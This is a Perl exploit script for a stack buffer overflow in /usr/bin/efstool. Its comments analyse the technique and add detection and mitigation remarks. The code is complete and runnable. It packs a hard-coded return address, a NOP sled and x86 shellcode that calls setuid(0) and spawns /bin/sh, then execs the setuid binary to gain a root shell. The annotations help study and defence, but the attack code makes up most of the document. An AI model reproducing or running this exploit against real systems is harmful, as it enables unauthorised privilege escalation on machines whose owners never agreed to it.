#!/usr/bin/perl
 # Another efstool exploit 

 # Analysis summary: this script builds one oversized command-line argument
 # and hands it to /usr/bin/efstool.  The argument is laid out as
 #   [return address repeated] [0x90 padding] [machine-code payload]
 # which is the classic shape of a stack buffer overflow against a program
 # that copies argv into a fixed-size buffer without a length check.

 # 33 bytes of x86 Linux machine code.  Decoded, the bytes issue syscall 0x17
 # (setuid) with a zero argument and then syscall 0x0b (execve) on the string
 # "//bin/sh".  The setuid(0) call suggests the author expects efstool to be
 # installed setuid root -- an assumption, the page does not say so.
 my $payload = join '',
     "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89",
     "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89",
     "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

 # Hard-coded address in the 0xbfff.... range.  It is a fixed guess, so
 # address-space layout randomisation invalidates it, and a non-executable
 # stack stops the payload from running even if the guess is right.
 my $base_addr  = 0xbfffe590;
 my $addr_bytes = 3000;       # length of the repeated-address region
 my $sled_total = 2000;       # budget for padding + payload
 my $pad_byte   = "\x90";     # x86 NOP

 # Optional single argument: an adjustment added to the hard-coded address.
 my $adjust = (@ARGV == 1) ? $ARGV[0] : 0;

 # The address is packed as a native signed 32-bit value ('l').
 my $packed = pack('l', ($base_addr + $adjust));

 # One 4-byte copy per step of 4 up to $addr_bytes (750 copies here).
 my $copies = int(($addr_bytes + 3) / 4);
 my $arg    = $packed x $copies;

 # Padding: $sled_total minus the payload length minus 100 NOP bytes.
 $arg .= $pad_byte x ($sled_total - length($payload) - 100);

 # Payload goes last.
 $arg .= $payload;

 # Detection note: the resulting process execution is /usr/bin/efstool with
 # a single argument of roughly 4.9 KB containing a long run of 0x90 bytes;
 # exec/audit logging that records argv length makes this easy to flag.
 # Mitigation note: drop the setuid bit from efstool where it is not needed,
 # or remove the binary, in addition to the generic hardening named above.
 exec("/usr/bin/efstool $arg");